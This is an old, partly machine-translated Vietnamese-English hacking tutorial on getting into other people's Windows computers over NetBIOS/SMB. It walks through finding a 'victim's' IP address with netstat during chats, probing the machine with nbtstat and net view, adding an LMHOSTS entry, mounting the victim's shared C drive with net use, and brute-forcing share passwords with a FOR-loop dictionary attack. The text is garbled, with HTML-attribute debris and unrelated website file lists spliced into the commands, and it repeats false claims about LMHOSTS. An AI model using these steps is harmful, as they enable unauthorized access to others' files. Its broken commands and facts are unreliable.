TCP 135 RPC / DCE Endpoint mapper UDP 137 NetBIOS Name Service UDP 138 NetBIOS Datagram Service TCP 139 NetBIOS Sesion Service (SMB / CIFS over NetBIOS TCP / UDP 445 Direct Host (SMB - Server Mesage Block CIFS - Common Internet File System) Mặc định thì Windows 9.x ( 95,98,98se ), NT4 và Windows2000 sẽ lắng nghe trên cổng 139, nhưng Windows 9.x không lắng nghe trên cổng TCP/UDP 135 ( => Because of this, the last time we detected an RPC bug, Virus Blaster did not affect computers running Windows 9.x.) Windows 2000 and XP also listened to TCP / UDP ports 445 Based on this knowledge and the Windows commands (these commands are usually in C: Windowssystem32 - or WinNT system32) people can access other computers in the network. Search for victim's IP An IP address is an IP number that identifies each computer on a given network. IP is represented as a 32 bit number, bits are divided into 4 bits per 8 bytes. There are 3 ways to represent an IP address Decimal form (most commonly used) Example: 130.57.30.56 Binary form: 10000010.00111001.00011110.00111000 Hexadecimal 82 39 1E 38 In each IP address, there are two parts, the network address (Networrk Address) and the address (Node Address). Computers in a network always have the same network address (You can find more details on IP address on HVA portal) To know your IP address you can use the command in windows to see: If you are using Windows 9, x: Click on Start run then type command and press Ok (To run DOS-DOS shell) At the prompt of the DOS command type the command IPCONFIG (or IPCONFIG / ALL) If you use Win98 can use Start run and then type the WINIPCFG command also gives the same results 2- If you use Win2000, XP ... Click Start run then type cmd and then OK (To run DOS - DOS shell) At the prompt of the DOS command type the command IPCONFIG (or IPCONFIG / ALL) Notice the IP Address line and then look to the right to see some of the format xxxx.xxxx.xxx.xxx <= đó="" chính="" là="" địa="" chỉ="" ip="" của="" bạn="" khi="" bạn="" vào="" mạng="" công="" việc="" tìm="" kiếm="" ip="" và="" xem="" nó="" có="" mở="" cổng="" không="" của="" victim="" thường="" mất="" rất="" nhiều="" thời="" gian="" -="" người="" ta="" có="" thể="" dùng="" một="" số="" tool="" để="" thực="" hiện="" việc="" tìm="" kiếm="" cho="" nhanh="" (="" và="" đỡ="" tốn="" tiền="" net="" )="" như="" netscanpro2000,="" hay="" esential="" nettools="" (="" et3="" ),="" ip="" tool="" ...="" -="" bài="" hướng="" dẫn="" về="" cách="" sử="" dụng="" và="" nơi="" download="" cũng="" có="" trên="" 4rum="" -="" các="" bạn="" có="" thể="" vào="" mục="" đồ="" nghề="" để="" tìm="" nếu="" bạn="" đang="" sử="" dụng="" icq="" để="" chát="" với="" victim="" bạn="" có="" thể="" sử="" dụng="" lệnh="" netstat="" -n="" (="" lệnh="" này="" sẽ="" cho="" ta="" biết="" các="" kết="" nối="" đựơc="" thiết="" lập="" giữa="" máy="" của="" ta="" và="" bên="" ngoài="" và="" qua="" các="" cổng="" nào="" )="" để="" biết="" ip="" của="" victim.="" ví="" dụ="" sau="" khi="" chạy="" lệnh="" netstat="" -n="" ta="" sẽ="" nhận="" đựơc="" bảng="" sau="" :="" active="" connections="" proto="" local="" address="" foreign="" address="" state="" tcp="" 192.168.0.1:3537="" 203.195.136.156:2869="" established="" ........................................................................................................................................................................................="" bạn="" chú="" ý="" nhìn="" ở="" dưới="" dòng="" chữ="" foreign="" address="" số="" 203.195.136.156=""> <= đó="" là="" địa="" chỉ="" ip="" của="" victim,="" còn="" số="" 2869="" chính="" là="" cổng="" kết="" nối="" chữ="" established=""> Tells you that a connection has been established between your computer and victim. If you use MSN or YH, if you use the netstat - n command you may not see the victim 's IP address, which may be the address of the MSN or YH server. To determine exactly how you can use YH's Send File to send a file to the victim. Before Send File, use the netstat -n command to identify the existing connections trong khi đang Send file bạn lại sưe dụng lệnh netstat -n +> sau đó tìm địa chỉ IP nào mà mới được thiết lập => That's exactly the IP address of Victim (because when Send file it will establish a direct connection between your machine and victim) Once you have the victim's IP address you use the nbtstat -a ipAddress command (this command is used to identify some information on the victim machine ...) Ví dụ : C:> nbtstat - a 203.210.136.23 ( <= đây="" là="" địa="" chỉ="" mô="" phỏng="" thôi="" đấy="" nhé="" -="" đừng="" thử="" )="" bạn="" có="" thể="" nhận="" được="" các="" dòng="" như="" sau="" netbios="" remote="" machine="" name="" table="" name="" type="" status="" may1=""> <00> Unique Registered netde <00> Group Registered may1 <03> Unique Registered may1 <20> Unique Registered ............................... MAC address 00-32-04-14-23-E6 Here you pay attention to the number <20> If you see this number means victim has enabled file and printer sharing (File And Printer Sharing) Next we use the net view ipaddress command (this command is to see what the heart to share what to ....) Ví dụ : C:> net view 203.210.136.23 You can see the lines similar to below: Shared resource at 203.210.136.23 Share name Type User As Comment C Disk D Disk IPC $ Disk .................................................. ....................... The command complete succesfully Here you go to find the file LMHost - if not then create (If you use windows98, it is located in the windows folder, if in XP in the WindowsSystem32Drivers etc, Win2000 is in WinNTSystem32Drivers etc) The breakdown of LMHost: Previously the hostname and IP address were stored in it - It was used to resolve the hostname and the IP address (Name - to - Address). This file is updated and managed by the SRI - NIC (Standford Research Institute Network Information Center), once every few weeks the organization updates its contents. Ngày trước các Admin của mạng thường Download về Server của mình. Dần dần số lượng của các trang Web trên Net ngày càng nhiều => cách sử dụng này trở nên thiếu hiệu quả và mất thời gian => DNS was born ... (There is also a detailed article on DNS on HVA portal) Then you add in this file the following syntax: ipAddressvictim name of the machine #PRE For example here I added the line: 203.210.136.23 MAY1 #PRE in the LMHost file Then run the nbtstat -R command to reload the table cache Now you can create a new drive on your computer and connect to the live or shared folder on the victim's computer using the Net use command. Net use Disc name: ipAddressVictimshareName For example: Net use X: 203.210.136.23C If you see the command line Lệnh đã hoàn thành succesfully Done, double-click My Computer and see if there is something new on my computer. To avoid confusion when mapping the drive one can use notation 1 AzSoft_watermark_big.png AzSoft_watermark_small.png cong-listening? P = 1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist. text.txt tmpdesktop.txt .txt transresult.txt wm.AzSoft.com www.mailenable.com www.microsoft.com instead of drive letter net use 1 AzSoft_watermark_small.png cong-listening? p = 1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.AzSoft.com label: Some Text link_original.txt link .txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02 .html tmp03.html tmp2.html tmpdesc4.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.AzSoft.com www.mailenable. com www.microsoft.com 203.210.136.23C But sometimes when life is not as beautiful as when you slow down your line or because the victim machine access pass. ... If the victim machine uses Windows 95,98,98se or Win me you can temporarily use the pass: PQWAK (this is the same as the concat on the old Main) Thế thì còn máy tính dùng 2000 hay XP ... mà đặt pass và user thì làm thế nào => You can build a dictionary to detect and use the DOS command to execute For example, I would create a file called DoPass.txt and have the following format: username password mật khẩu quản trị "" Administrator admin Administrator .................................................. .......... And then we can use the For command C: FOR / F "token = 1,2 *"% i in (DoPass.txt) For net use IpAddressvictimShareName (FOR command syntax for use in the help of Windows) Phuong1234dong
